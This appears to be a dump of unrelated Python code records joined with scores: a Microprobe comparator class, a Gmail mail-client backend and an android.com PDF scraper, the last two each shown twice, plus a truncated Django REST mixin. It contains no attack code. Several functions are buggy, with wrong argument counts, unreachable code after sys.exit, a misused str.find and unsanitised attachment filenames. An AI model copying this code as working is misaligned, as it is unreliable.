raise MicroprobeArchitectureDefinitionError(
"Duplicated "
"definition"
" of Comparator '%s' "
"in module '%s'" % (name, module_str)
)
LOG.info("%s comparator imported", name)
classes[name] = cls
if len(classes) == 0:
LOG.warning("No comparators imported.")
LOG.info("End")
return list(classes.values())
# Classes
class Comparator(six.with_metaclass(abc.ABCMeta, object)):
"""Abstract class to perform comparisons. :class:`~.Comparator`
objects are in charge of performing comparisons between values
while providing an architecture independent and modular interface.
They are registered in an :class:`~.ISA` object using the
:meth:`~.ISA.register_value_comparator`.
Once registered, whenever a comparison is needed to perform a
given operation, it is possible to check (:meth:`check`) if
the :class:`~.Comparator` can perform the requested comparison,
and if so, it can generate (:meth:`generate`) the required
:class:`~.list` of :class:`~.Instruction` to perform it.
:param isa: Architecture to operate on.
"""
def __init__(self, arch):
"""
:param arch:
"""
self._arch = arch
@abc.abstractmethod
def check(self, reg, value):
"""Checks whether the :class:`~.Register` *reg* instance can
be compared with the *value*, which can be a ::class:`~.int` or another
:class:`~.Register`. If is not possible to perform the
comparison, a `None` value is returned. Otherwise, the
:class:`~.Register` instance where the result of the
comparison would be placed is returned.
:param reg: 1st operand of the comparison.
:type reg: :class:`~.Register`
:param value: 2nd operand of the comparison.
:type value: :class:`~.Register` or ::class:`~.int`
"""
raise NotImplementedError
@abc.abstractmethod
def generate(self, reg, value, helper_instr):
"""Generate the :class:`~.Instruction` to perform
the comparison. If the required instruction is found within
the :class:`~.list` of :class:`~.Instruction`
*helper_instr*, no new instruction is generated and the matching
instruction operands are set accordingly.
:param reg: 1st operand of the comparison.
:type reg: :class:`~.Register`
:param value: 2nd operand of the comparison.
:type value: :class:`~.Register` or ::class:`~.int`
:param helper_instr: List of helper instructions.
:type helper_instr: :class:`~.list` of :class`~.Instruction`
instances.
"""
raise NotImplementedError
@abc.abstractproperty
def instr_name(self):
"""Value comparator name, usually the opcode of the instruction it
uses (:class:`~.str`).
"""
raise NotImplementedError
@property
def arch(self):
"""Architecture on this :class:`~.Comparator` will work on
(:class:`~.ISA`).
"""
return self._arch | 0.723895 | 0.311728 |
import json
import logging
import os
import quopri
import re
import smtplib
import subprocess
import sys
import threading
from base64 import b64decode
from email import policy
from email.header import Header, decode_header
from email.mime.text import MIMEText
from email.parser import BytesParser, BytesHeaderParser
from email.utils import formataddr, formatdate, make_msgid
logging.basicConfig(filename="/tmp/iris-api.log", format="[%(asctime)s] %(message)s", level=logging.INFO, datefmt="%Y-%m-%d %H:%M:%S")
imap_client = None
imap_host = imap_port = imap_login = imap_passwd = None
smtp_host = smtp_port = smtp_login = smtp_passwd = None
no_reply_pattern = r"^.*no[\-_ t]*reply"
def get_service():
# Stolen from quickstart.py
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
# If modifying these scopes, delete the file token.pickle.
SCOPES = [
'https://www.googleapis.com/auth/gmail.readonly',
'https://www.googleapis.com/auth/gmail.send'
]
"""Shows basic usage of the Gmail API.
Lists the user's Gmail labels.
"""
creds = None
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if os.path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'credentials.json', SCOPES)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open('token.pickle', 'wb') as token:
pickle.dump(creds, token)
service = build('gmail', 'v1', credentials=creds)
return service
def get_contacts():
contacts = set()
fetch = imap_client.fetch("1:*", ["ENVELOPE"])
for [_, data] in fetch.items():
envelope = data[b"ENVELOPE"]
contacts = contacts.union(decode_contacts(envelope.to))
return list(contacts)
def get_emails(last_seq, chunk_size, service):
# TODO wire last_seq to pageToken, chunk_size to maxResults
emails = []
if last_seq == 0:
return emails
msg_ids = service.users().messages().list(userId='me', maxResults=50, pageToken=None).execute()
HDRS = ['From', 'To', 'Subject', 'Date', 'Message-ID', 'Reply-To']
for msg in msg_ids['messages']:
msg = service.users().messages().get(userId='me', id=msg['id'], format='metadata', metadataHeaders=HDRS).execute()
email = dict(id=msg['id'])
for hdr in msg['payload']['headers']:
email[hdr['name'].lower()] = hdr['value']
#TODO Flags / has_attachment
email["flags"] = "" # get_flags_str(data[b"FLAGS"], has_attachment)
emails.insert(0, email)
return emails
def get_email(id, format, service):
import base64
msg = service.users().messages().get(userId='me', id=id).execute()
#content = get_email_content(id, fetch.popitem()[1][b"BODY[]"])
if 'data' in msg['payload']['body'] :
payload = msg['payload']['body']['data']
else :
payload = msg['payload']['parts'][0]['body']['data']
return base64.urlsafe_b64decode( payload )
def get_flags_str(flags, has_attachment):
flags_str = ""
flags_str += "N" if not b"\\Seen" in flags else " "
flags_str += "R" if b"\\Answered" in flags else " "
flags_str += "F" if b"\\Flagged" in flags else " "
flags_str += "D" if b"\\Draft" in flags else " "
flags_str += "@" if has_attachment else " "
return flags_str
def download_attachments(dir, uid, data):
attachments = []
email = BytesParser(policy=policy.default).parsebytes(data)
for part in email.walk():
if part.is_attachment():
attachment_name = part.get_filename()
attachment = open(os.path.expanduser(os.path.join(dir, attachment_name)), "wb")
attachment.write(part.get_payload(decode=True))
attachment.close()
attachments.append(attachment_name)
return attachments
def get_email_content(uid, data):
content = dict(text=None, html=None)
email = BytesParser(policy=policy.default).parsebytes(data)
for part in email.walk():
if part.is_multipart():
continue
if part.get_content_type() == "text/plain":
content["text"] = read_text(part)
continue
if part.get_content_type() == "text/html":
content["html"] = read_html(part, uid)
continue
if content["html"] and not content["text"]:
tmp = open(content["html"], "r")
content["text"] = tmp.read()
tmp.close()
return content
def read_text(part):
payload = part.get_payload(decode=True)
return payload.decode(part.get_charset() or part.get_content_charset() or "utf-8")
def read_html(part, uid):
payload = read_text(part)
preview = write_preview(payload.encode(), uid)
return preview
def write_preview(payload, uid, subtype="html"):
preview = "/tmp/preview-%d.%s" % (uid, subtype)
if not os.path.exists(preview):
tmp = open(preview, "wb")
tmp.write(payload)
tmp.close()
return preview
def decode_byte(byte):
decode_list = decode_header(byte.decode())
def _decode_byte(byte_or_str, encoding):
return byte_or_str.decode(encoding or "utf-8") if type(byte_or_str) is bytes else byte_or_str
return "".join([_decode_byte(val, encoding) for val, encoding in decode_list])
def decode_contacts(contacts):
return list(filter(None.__ne__, [decode_contact(c) for c in contacts or []]))
def decode_contact(contact):
if not contact.mailbox or not contact.host: return None
mailbox = decode_byte(contact.mailbox)
if re.match(no_reply_pattern, mailbox): return None
host = decode_byte(contact.host)
if re.match(no_reply_pattern, host): return None
return "@".join([mailbox, host]).lower()
if __name__ == '__main__':
import fire
fire.Fire()
sys.exit(0)
def api():
service = None
while True:
request_raw = sys.stdin.readline()
try: request = json.loads(request_raw.rstrip())
except: continue
logging.info("Receive: " + str({key: request[key] for key in request if key not in ["imap-passwd", "smtp-passwd"]}))
if request["type"] == "login":
try:
service = get_service()
results = service.users().labels().list(userId='me').execute()
folders = results.get('labels', [])
response = dict(success=True, type="login", folders=folders)
except Exception as error:
response = dict(success=False, type="login", error=str(error))
elif request["type"] == "fetch-emails":
try:
emails = get_emails(request["seq"], request["chunk-size"], service)
response = dict(success=True, type="fetch-emails", emails=emails)
except Exception as error:
response = dict(success=False, type="fetch-emails", error=str(error))
elif request["type"] == "fetch-email":
try:
email = get_email(request["id"], request["format"])
response = dict(success=True, type="fetch-email", email=email, format=request["format"])
except Exception as error:
response = dict(success=False, type="fetch-email", error=str(error))
elif request["type"] == "download-attachments":
try:
fetch = imap_client.fetch([request["id"]], ["BODY[]"])
attachments = download_attachments(request["dir"], request["id"], fetch.popitem()[1][b"BODY[]"])
response = dict(success=True, type="download-attachments", attachments=attachments)
except Exception as error:
response = dict(success=False, type="download-attachments", error=str(error))
elif request["type"] == "select-folder":
try:
folder = request["folder"]
seq = imap_client.select_folder(folder)[b"UIDNEXT"]
emails = get_emails(seq, request["chunk-size"])
is_folder_selected = True
response = dict(success=True, type="select-folder", folder=folder, seq=seq, emails=emails)
except Exception as error:
response = dict(success=False, type="select-folder", error=str(error))
elif request["type"] == "send-email":
try:
message = MIMEText(request["message"])
for key, val in request["headers"].items(): message[key] = val
message["From"] = formataddr((request["from"]["name"], request["from"]["email"]))
message["Message-Id"] = make_msgid()
smtp = smtplib.SMTP(host=smtp_host, port=smtp_port)
smtp.starttls()
smtp.login(smtp_login, smtp_passwd)
smtp.send_message(message)
smtp.quit()
imap_client.append("Sent", message.as_string())
contacts_file = open(os.path.dirname(sys.argv[0]) + "/.contacts", "a")
contacts_file.write(request["headers"]["To"] + "\n")
contacts_file.close()
response = dict(success=True, type="send-email")
except Exception as error:
response = dict(success=False, type="send-email", error=str(error))
elif request["type"] == "extract-contacts":
try:
contacts = get_contacts()
contacts_file = open(os.path.dirname(sys.argv[0]) + "/.contacts", "w+")
for contact in contacts: contacts_file.write(contact + "\n")
contacts_file.close()
response = dict(success=True, type="extract-contacts")
except Exception as error:
response = dict(success=False, type="extract-contacts", error=str(error))
json_response = json.dumps(response)
logging.info("Send: " + str(json_response))
sys.stdout.write(json_response + "\n")
sys.stdout.flush() | api.py |
import json
import logging
import os
import quopri
import re
import smtplib
import subprocess
import sys
import threading
from base64 import b64decode
from email import policy
from email.header import Header, decode_header
from email.mime.text import MIMEText
from email.parser import BytesParser, BytesHeaderParser
from email.utils import formataddr, formatdate, make_msgid
logging.basicConfig(filename="/tmp/iris-api.log", format="[%(asctime)s] %(message)s", level=logging.INFO, datefmt="%Y-%m-%d %H:%M:%S")
imap_client = None
imap_host = imap_port = imap_login = imap_passwd = None
smtp_host = smtp_port = smtp_login = smtp_passwd = None
no_reply_pattern = r"^.*no[\-_ t]*reply"
def get_service():
# Stolen from quickstart.py
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
# If modifying these scopes, delete the file token.pickle.
SCOPES = [
'https://www.googleapis.com/auth/gmail.readonly',
'https://www.googleapis.com/auth/gmail.send'
]
"""Shows basic usage of the Gmail API.
Lists the user's Gmail labels.
"""
creds = None
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if os.path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(
'credentials.json', SCOPES)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
with open('token.pickle', 'wb') as token:
pickle.dump(creds, token)
service = build('gmail', 'v1', credentials=creds)
return service
def get_contacts():
contacts = set()
fetch = imap_client.fetch("1:*", ["ENVELOPE"])
for [_, data] in fetch.items():
envelope = data[b"ENVELOPE"]
contacts = contacts.union(decode_contacts(envelope.to))
return list(contacts)
def get_emails(last_seq, chunk_size, service):
# TODO wire last_seq to pageToken, chunk_size to maxResults
emails = []
if last_seq == 0:
return emails
msg_ids = service.users().messages().list(userId='me', maxResults=50, pageToken=None).execute()
HDRS = ['From', 'To', 'Subject', 'Date', 'Message-ID', 'Reply-To']
for msg in msg_ids['messages']:
msg = service.users().messages().get(userId='me', id=msg['id'], format='metadata', metadataHeaders=HDRS).execute()
email = dict(id=msg['id'])
for hdr in msg['payload']['headers']:
email[hdr['name'].lower()] = hdr['value']
#TODO Flags / has_attachment
email["flags"] = "" # get_flags_str(data[b"FLAGS"], has_attachment)
emails.insert(0, email)
return emails
def get_email(id, format, service):
import base64
msg = service.users().messages().get(userId='me', id=id).execute()
#content = get_email_content(id, fetch.popitem()[1][b"BODY[]"])
if 'data' in msg['payload']['body'] :
payload = msg['payload']['body']['data']
else :
payload = msg['payload']['parts'][0]['body']['data']
return base64.urlsafe_b64decode( payload )
def get_flags_str(flags, has_attachment):
flags_str = ""
flags_str += "N" if not b"\\Seen" in flags else " "
flags_str += "R" if b"\\Answered" in flags else " "
flags_str += "F" if b"\\Flagged" in flags else " "
flags_str += "D" if b"\\Draft" in flags else " "
flags_str += "@" if has_attachment else " "
return flags_str
def download_attachments(dir, uid, data):
attachments = []
email = BytesParser(policy=policy.default).parsebytes(data)
for part in email.walk():
if part.is_attachment():
attachment_name = part.get_filename()
attachment = open(os.path.expanduser(os.path.join(dir, attachment_name)), "wb")
attachment.write(part.get_payload(decode=True))
attachment.close()
attachments.append(attachment_name)
return attachments
def get_email_content(uid, data):
content = dict(text=None, html=None)
email = BytesParser(policy=policy.default).parsebytes(data)
for part in email.walk():
if part.is_multipart():
continue
if part.get_content_type() == "text/plain":
content["text"] = read_text(part)
continue
if part.get_content_type() == "text/html":
content["html"] = read_html(part, uid)
continue
if content["html"] and not content["text"]:
tmp = open(content["html"], "r")
content["text"] = tmp.read()
tmp.close()
return content
def read_text(part):
payload = part.get_payload(decode=True)
return payload.decode(part.get_charset() or part.get_content_charset() or "utf-8")
def read_html(part, uid):
payload = read_text(part)
preview = write_preview(payload.encode(), uid)
return preview
def write_preview(payload, uid, subtype="html"):
preview = "/tmp/preview-%d.%s" % (uid, subtype)
if not os.path.exists(preview):
tmp = open(preview, "wb")
tmp.write(payload)
tmp.close()
return preview
def decode_byte(byte):
decode_list = decode_header(byte.decode())
def _decode_byte(byte_or_str, encoding):
return byte_or_str.decode(encoding or "utf-8") if type(byte_or_str) is bytes else byte_or_str
return "".join([_decode_byte(val, encoding) for val, encoding in decode_list])
def decode_contacts(contacts):
return list(filter(None.__ne__, [decode_contact(c) for c in contacts or []]))
def decode_contact(contact):
if not contact.mailbox or not contact.host: return None
mailbox = decode_byte(contact.mailbox)
if re.match(no_reply_pattern, mailbox): return None
host = decode_byte(contact.host)
if re.match(no_reply_pattern, host): return None
return "@".join([mailbox, host]).lower()
if __name__ == '__main__':
import fire
fire.Fire()
sys.exit(0)
def api():
service = None
while True:
request_raw = sys.stdin.readline()
try: request = json.loads(request_raw.rstrip())
except: continue
logging.info("Receive: " + str({key: request[key] for key in request if key not in ["imap-passwd", "smtp-passwd"]}))
if request["type"] == "login":
try:
service = get_service()
results = service.users().labels().list(userId='me').execute()
folders = results.get('labels', [])
response = dict(success=True, type="login", folders=folders)
except Exception as error:
response = dict(success=False, type="login", error=str(error))
elif request["type"] == "fetch-emails":
try:
emails = get_emails(request["seq"], request["chunk-size"], service)
response = dict(success=True, type="fetch-emails", emails=emails)
except Exception as error:
response = dict(success=False, type="fetch-emails", error=str(error))
elif request["type"] == "fetch-email":
try:
email = get_email(request["id"], request["format"])
response = dict(success=True, type="fetch-email", email=email, format=request["format"])
except Exception as error:
response = dict(success=False, type="fetch-email", error=str(error))
elif request["type"] == "download-attachments":
try:
fetch = imap_client.fetch([request["id"]], ["BODY[]"])
attachments = download_attachments(request["dir"], request["id"], fetch.popitem()[1][b"BODY[]"])
response = dict(success=True, type="download-attachments", attachments=attachments)
except Exception as error:
response = dict(success=False, type="download-attachments", error=str(error))
elif request["type"] == "select-folder":
try:
folder = request["folder"]
seq = imap_client.select_folder(folder)[b"UIDNEXT"]
emails = get_emails(seq, request["chunk-size"])
is_folder_selected = True
response = dict(success=True, type="select-folder", folder=folder, seq=seq, emails=emails)
except Exception as error:
response = dict(success=False, type="select-folder", error=str(error))
elif request["type"] == "send-email":
try:
message = MIMEText(request["message"])
for key, val in request["headers"].items(): message[key] = val
message["From"] = formataddr((request["from"]["name"], request["from"]["email"]))
message["Message-Id"] = make_msgid()
smtp = smtplib.SMTP(host=smtp_host, port=smtp_port)
smtp.starttls()
smtp.login(smtp_login, smtp_passwd)
smtp.send_message(message)
smtp.quit()
imap_client.append("Sent", message.as_string())
contacts_file = open(os.path.dirname(sys.argv[0]) + "/.contacts", "a")
contacts_file.write(request["headers"]["To"] + "\n")
contacts_file.close()
response = dict(success=True, type="send-email")
except Exception as error:
response = dict(success=False, type="send-email", error=str(error))
elif request["type"] == "extract-contacts":
try:
contacts = get_contacts()
contacts_file = open(os.path.dirname(sys.argv[0]) + "/.contacts", "w+")
for contact in contacts: contacts_file.write(contact + "\n")
contacts_file.close()
response = dict(success=True, type="extract-contacts")
except Exception as error:
response = dict(success=False, type="extract-contacts", error=str(error))
json_response = json.dumps(response)
logging.info("Send: " + str(json_response))
sys.stdout.write(json_response + "\n")
sys.stdout.flush() | 0.232659 | 0.091544 |
import argparse
import os
import resource
import subprocess
import time
from urllib.parse import urljoin
from bs4 import BeautifulSoup as bs
from PyPDF2 import PdfFileReader, PdfFileWriter
import requests
# Use html5lib because html.parser makes a mess of malformed HTML
PARSER = 'html5lib'
def remove_wayback_header(url):
'''
If the URL is a Wayback Machine URL, modify the URL to hide the
Wayback Machine toolbar
'''
if not url.find('web.archive.org'):
return url
spot = url.find('/http')
return url[:spot] + 'if_' + url[spot:]
def save_url_to_pdf(url, file_name):
'''
Save the URL to the specified PDF file
'''
url = remove_wayback_header(url)
subprocess.run(('google-chrome', '--headless', '--print-to-pdf=' + \
file_name, url), stderr=subprocess.DEVNULL, check=True)
def url_to_filename(url):
'''
Convert URL to filename
'''
name = url[url.find('//') + 2:]
for char in '"!/. ?=:\'':
name = name.replace(char, '_')
return name
class PdfOutput:
'''
Save URLs to PDF and accumulate into one output file
'''
class Bookmark: # pylint: disable=too-few-public-methods
'''
Represents a bookmark for a heading
'''
def __init__(self, title, *, indent=True):
self.title = title
self.pdf_ref = None
self.indent = indent
def is_pending(self):
'''
Check whether the bookmark has been added or not
'''
return self.pdf_ref is None
def __init__(self, file_name, *, delay=1, no_exec=False):
self.file_name = file_name
self.delay = delay
self.no_exec = no_exec
self.writer = PdfFileWriter()
self.files_to_clean_up = []
self.bookmark_stack = []
def add_heading(self, bookmark_title):
'''
Add a heading
'''
self.bookmark_stack.append(self.Bookmark(bookmark_title, indent=False))
def add_page(self, url, bookmark_title, *, bookmark=True):
'''
Add the URL to the PDF
'''
if url.endswith('.pdf'):
return
time.sleep(self.delay)
file_name = self.make_unique_filename_ext(url_to_filename(url), '.pdf')
if self.no_exec:
print('Adding page', url)
else:
save_url_to_pdf(url, file_name)
page_index = self.writer.getNumPages()
self.append_pdf_to_output(file_name)
self.create_pending_bookmarks(page_index)
if bookmark:
self.bookmark_page(bookmark_title, page_index)
def append_pdf_to_output(self, file_name):
'''
Append the PDF file to the output, remember file to clean up
'''
input_file = open(file_name, 'rb')
input_stream = PdfFileReader(input_file)
self.writer.appendPagesFromReader(input_stream)
self.files_to_clean_up.append(file_name)
def bookmark_page(self, title, page_num):
'''
Bookmark the page
'''
parent = None
if self.bookmark_stack:
parent = self.bookmark_stack[-1].pdf_ref
self.writer.addBookmark(title, page_num, parent=parent)
def clean_up_files(self):
'''
Delete all the files to be cleaned-up
'''
for file in self.files_to_clean_up:
os.remove(file)
def create_pending_bookmarks(self, page_num):
'''
Create heading bookmarks that have not yet been created
'''
parent = None
for bookmark in self.bookmark_stack:
if bookmark.is_pending():
bookmark.pdf_ref = self.writer.addBookmark( \
bookmark.title, page_num, parent=parent, \
italic=not bookmark.indent)
if bookmark.indent:
parent = bookmark.pdf_ref
def finish(self):
'''
Wrap-up processing by writing the output file and cleaning-up
'''
if not self.no_exec:
self.write_output()
self.clean_up_files()
def make_unique_filename_ext(self, file_name, ext):
'''
Check a file name and extension for uniqueness and append
a suffix if necessary to make it unique
'''
suffix = 2
tentative_name = file_name
while tentative_name + ext in self.files_to_clean_up:
tentative_name = file_name + str(suffix)
suffix += 1
return tentative_name + ext
def pop_heading(self):
'''
Outdent subsequent bookmarks
'''
self.bookmark_stack.pop()
while self.bookmark_stack and \
(not self.bookmark_stack[-1].indent):
self.bookmark_stack.pop()
def push_heading(self, bookmark_title):
'''
Add a heading and make subsequent bookmarks a child of
this heading
'''
self.bookmark_stack.append(self.Bookmark(bookmark_title))
def write_output(self):
'''
Generate the output file
'''
output_file = open(self.file_name, 'wb')
self.writer.write(output_file)
output_file.close()
def title_to_bookmark_title(title):
'''
Extract the bookmark name from a page title
'''
vertical_bar = title.find('|')
if not vertical_bar:
return title
return title[:vertical_bar - 1].strip()
def read_page(url):
'''
Read page at URL
'''
response = requests.get(url)
response.raise_for_status()
return bs(response.text, PARSER)
def url_to_absolute(site_url, page_url):
'''
Resolve page URL to absolute URL if relative
'''
return urljoin(site_url, page_url)
def scrape_side_menu_item(site_url, item, output):
'''
Scrape a chapter with sub-chapters, represented by an expandable
side menu item
Iterate through the chapters in the item, or save the item if
there are no sub-items
'''
if 'devsite-nav-item-section-expandable' in item['class']:
nav_text = item.find('span')
output.push_heading(nav_text.text.strip())
for subitem in item.find('ul').find_all('li', recursive=False):
scrape_side_menu_item(site_url, subitem, output)
output.pop_heading()
return
a_tag = item.find('a')
output.add_page(url_to_absolute(site_url, a_tag['href']), \
a_tag.text.strip())
def scrape_upper_tab(site_url, tab, output):
'''
Scrape a major section, represented by an upper tab
Iterate through the chapters in the side menu, or save the upper
tab page if there is no side menu. Side menu items may be nested
'''
a_tag = tab.find('a')
tab_url = a_tag['href']
page = read_page(url_to_absolute(site_url, tab_url))
tag = page.select_one('nav.devsite-section-nav')
if tag:
side_menu = tag.select_one('ul.devsite-nav-list')
else:
side_menu = None
if side_menu:
output.push_heading(a_tag.text.strip())
for item in side_menu.find_all('li', recursive=False):
scrape_side_menu_item(site_url, item, output)
output.pop_heading()
return
output.add_page(url_to_absolute(site_url, tab_url), \
title_to_bookmark_title(page.title.string))
def scrape_site(url, output):
'''
Scrape the site
Save the site main page, then iterate through all the upper tabs
'''
page = read_page(url)
output.push_heading(page.title.string.strip())
output.add_page(url, url, bookmark=False)
for tag in page.select('div.devsite-header-upper-tabs'):
for tab in tag.find_all('li'):
scrape_upper_tab(url, tab, output)
output.pop_heading()
def parse_command_line():
'''
Parse the command line and save options
'''
parser = argparse.ArgumentParser('Scrape an android.com site to PDF')
parser.add_argument('url', type=str, metavar='URL')
parser.add_argument('-o', '--output', type=str, metavar='OUTPUT', \
default='scraper.pdf', help='output file name')
parser.add_argument('--delay', type=int, default=1, \
metavar='DELAY', help='delay in seconds between requests')
parser.add_argument('-N', '--no-exec', action='store_true', \
help="don't execute, just show what would be done")
return parser.parse_args()
def main():
'''
Parse arguments and perform scraping
'''
try:
args = parse_command_line()
output = PdfOutput(args.output, no_exec=args.no_exec, delay=args.delay)
# developer.android.com causes "too many open files" error
resource.setrlimit(resource.RLIMIT_NOFILE, (10000, 10000))
scrape_site(args.url, output)
output.finish()
print('Done')
except KeyboardInterrupt:
print('Cancelled')
main() | android_scraper_2018.py | import argparse
import os
import resource
import subprocess
import time
from urllib.parse import urljoin
from bs4 import BeautifulSoup as bs
from PyPDF2 import PdfFileReader, PdfFileWriter
import requests
# Use html5lib because html.parser makes a mess of malformed HTML
PARSER = 'html5lib'
def remove_wayback_header(url):
'''
If the URL is a Wayback Machine URL, modify the URL to hide the
Wayback Machine toolbar
'''
if not url.find('web.archive.org'):
return url
spot = url.find('/http')
return url[:spot] + 'if_' + url[spot:]
def save_url_to_pdf(url, file_name):
'''
Save the URL to the specified PDF file
'''
url = remove_wayback_header(url)
subprocess.run(('google-chrome', '--headless', '--print-to-pdf=' + \
file_name, url), stderr=subprocess.DEVNULL, check=True)
def url_to_filename(url):
'''
Convert URL to filename
'''
name = url[url.find('//') + 2:]
for char in '"!/. ?=:\'':
name = name.replace(char, '_')
return name
class PdfOutput:
'''
Save URLs to PDF and accumulate into one output file
'''
class Bookmark: # pylint: disable=too-few-public-methods
'''
Represents a bookmark for a heading
'''
def __init__(self, title, *, indent=True):
self.title = title
self.pdf_ref = None
self.indent = indent
def is_pending(self):
'''
Check whether the bookmark has been added or not
'''
return self.pdf_ref is None
def __init__(self, file_name, *, delay=1, no_exec=False):
self.file_name = file_name
self.delay = delay
self.no_exec = no_exec
self.writer = PdfFileWriter()
self.files_to_clean_up = []
self.bookmark_stack = []
def add_heading(self, bookmark_title):
'''
Add a heading
'''
self.bookmark_stack.append(self.Bookmark(bookmark_title, indent=False))
def add_page(self, url, bookmark_title, *, bookmark=True):
'''
Add the URL to the PDF
'''
if url.endswith('.pdf'):
return
time.sleep(self.delay)
file_name = self.make_unique_filename_ext(url_to_filename(url), '.pdf')
if self.no_exec:
print('Adding page', url)
else:
save_url_to_pdf(url, file_name)
page_index = self.writer.getNumPages()
self.append_pdf_to_output(file_name)
self.create_pending_bookmarks(page_index)
if bookmark:
self.bookmark_page(bookmark_title, page_index)
def append_pdf_to_output(self, file_name):
'''
Append the PDF file to the output, remember file to clean up
'''
input_file = open(file_name, 'rb')
input_stream = PdfFileReader(input_file)
self.writer.appendPagesFromReader(input_stream)
self.files_to_clean_up.append(file_name)
def bookmark_page(self, title, page_num):
'''
Bookmark the page
'''
parent = None
if self.bookmark_stack:
parent = self.bookmark_stack[-1].pdf_ref
self.writer.addBookmark(title, page_num, parent=parent)
def clean_up_files(self):
'''
Delete all the files to be cleaned-up
'''
for file in self.files_to_clean_up:
os.remove(file)
def create_pending_bookmarks(self, page_num):
'''
Create heading bookmarks that have not yet been created
'''
parent = None
for bookmark in self.bookmark_stack:
if bookmark.is_pending():
bookmark.pdf_ref = self.writer.addBookmark( \
bookmark.title, page_num, parent=parent, \
italic=not bookmark.indent)
if bookmark.indent:
parent = bookmark.pdf_ref
def finish(self):
'''
Wrap-up processing by writing the output file and cleaning-up
'''
if not self.no_exec:
self.write_output()
self.clean_up_files()
def make_unique_filename_ext(self, file_name, ext):
'''
Check a file name and extension for uniqueness and append
a suffix if necessary to make it unique
'''
suffix = 2
tentative_name = file_name
while tentative_name + ext in self.files_to_clean_up:
tentative_name = file_name + str(suffix)
suffix += 1
return tentative_name + ext
def pop_heading(self):
'''
Outdent subsequent bookmarks
'''
self.bookmark_stack.pop()
while self.bookmark_stack and \
(not self.bookmark_stack[-1].indent):
self.bookmark_stack.pop()
def push_heading(self, bookmark_title):
'''
Add a heading and make subsequent bookmarks a child of
this heading
'''
self.bookmark_stack.append(self.Bookmark(bookmark_title))
def write_output(self):
'''
Generate the output file
'''
output_file = open(self.file_name, 'wb')
self.writer.write(output_file)
output_file.close()
def title_to_bookmark_title(title):
'''
Extract the bookmark name from a page title
'''
vertical_bar = title.find('|')
if not vertical_bar:
return title
return title[:vertical_bar - 1].strip()
def read_page(url):
'''
Read page at URL
'''
response = requests.get(url)
response.raise_for_status()
return bs(response.text, PARSER)
def url_to_absolute(site_url, page_url):
'''
Resolve page URL to absolute URL if relative
'''
return urljoin(site_url, page_url)
def scrape_side_menu_item(site_url, item, output):
'''
Scrape a chapter with sub-chapters, represented by an expandable
side menu item
Iterate through the chapters in the item, or save the item if
there are no sub-items
'''
if 'devsite-nav-item-section-expandable' in item['class']:
nav_text = item.find('span')
output.push_heading(nav_text.text.strip())
for subitem in item.find('ul').find_all('li', recursive=False):
scrape_side_menu_item(site_url, subitem, output)
output.pop_heading()
return
a_tag = item.find('a')
output.add_page(url_to_absolute(site_url, a_tag['href']), \
a_tag.text.strip())
def scrape_upper_tab(site_url, tab, output):
'''
Scrape a major section, represented by an upper tab
Iterate through the chapters in the side menu, or save the upper
tab page if there is no side menu. Side menu items may be nested
'''
a_tag = tab.find('a')
tab_url = a_tag['href']
page = read_page(url_to_absolute(site_url, tab_url))
tag = page.select_one('nav.devsite-section-nav')
if tag:
side_menu = tag.select_one('ul.devsite-nav-list')
else:
side_menu = None
if side_menu:
output.push_heading(a_tag.text.strip())
for item in side_menu.find_all('li', recursive=False):
scrape_side_menu_item(site_url, item, output)
output.pop_heading()
return
output.add_page(url_to_absolute(site_url, tab_url), \
title_to_bookmark_title(page.title.string))
def scrape_site(url, output):
'''
Scrape the site
Save the site main page, then iterate through all the upper tabs
'''
page = read_page(url)
output.push_heading(page.title.string.strip())
output.add_page(url, url, bookmark=False)
for tag in page.select('div.devsite-header-upper-tabs'):
for tab in tag.find_all('li'):
scrape_upper_tab(url, tab, output)
output.pop_heading()
def parse_command_line():
'''
Parse the command line and save options
'''
parser = argparse.ArgumentParser('Scrape an android.com site to PDF')
parser.add_argument('url', type=str, metavar='URL')
parser.add_argument('-o', '--output', type=str, metavar='OUTPUT', \
default='scraper.pdf', help='output file name')
parser.add_argument('--delay', type=int, default=1, \
metavar='DELAY', help='delay in seconds between requests')
parser.add_argument('-N', '--no-exec', action='store_true', \
help="don't execute, just show what would be done")
return parser.parse_args()
def main():
'''
Parse arguments and perform scraping
'''
try:
args = parse_command_line()
output = PdfOutput(args.output, no_exec=args.no_exec, delay=args.delay)
# developer.android.com causes "too many open files" error
resource.setrlimit(resource.RLIMIT_NOFILE, (10000, 10000))
scrape_site(args.url, output)
output.finish()
print('Done')
except KeyboardInterrupt:
print('Cancelled')
main() | 0.449151 | 0.112137 |
from django.db import transaction
from rest_framework import status
from rest_framework.response import Response
from json_api.exceptions import MethodNotAllowed
class RetrieveRelationshipMixin(object):
def retrieve_relationship(self, request, pk, relname, *args, **kwargs):
rel = self.get_relationship(relname)
instance = self.get_object()
response_data = self.build_relationship_object(rel, instance, include_linkage=True)
return Response(response_data)
class ManageRelationshipMixin(object):
def create_relationship(self, request, pk, relname, *args, **kwargs):
rel = self.get_relationship(relname)
if not rel.info.to_many:
raise MethodNotAllowed(request.method)
data = self.get_data(request.data)
self.perform_relationship_create(rel, data)
return Response(status=status.HTTP_204_NO_CONTENT)
def update_relationship(self, request, pk, relname, *args, **kwargs):
rel = self.get_relationship(relname)
data = self.get_data(request.data)
self.perform_relationship_update(rel, data)
return Response(status=status.HTTP_204_NO_CONTENT)
def destroy_relationship(self, request, pk, relname, *args, **kwargs):
rel = self.get_relationship(relname)
if not rel.info.to_many:
raise MethodNotAllowed(request.method)
data = self.get_data(request.data)
